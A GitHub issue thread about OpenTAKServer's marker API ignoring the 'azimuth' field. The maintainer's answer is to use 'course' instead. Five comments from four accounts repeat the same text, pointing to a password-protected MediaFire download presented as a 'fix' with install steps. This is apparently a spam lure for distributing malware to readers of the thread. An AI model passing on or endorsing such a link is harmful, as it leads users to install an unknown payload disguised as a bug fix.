### ISSUE TITLE
Bearing not working on POST Marker Endpoint

### ISSUE THREAD

**Issue by valmojr** [brian7704/OpenTAKServer#47]
While using the api/markers endpoint with a POST request, using this body:
```json
{
	"uid": "9b746a71-ceaf-42b8-92dd-22f0ecb97180",
	"name":"Valmo",
	"latitude":39.955470174560547,
	"longitude":25.247599813842773,
	"type":"a-f-G-U-C-I-Z",
	"azimuth":150,
	"speed":0
}
```

The "azimuth" property is being ignore, the outputed marker always says "354º" as bearing no matter the value on azimuth

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by brian7704** [comment]
This was solved on the discord server but the solution was to use `course` instead of `azimuth`.
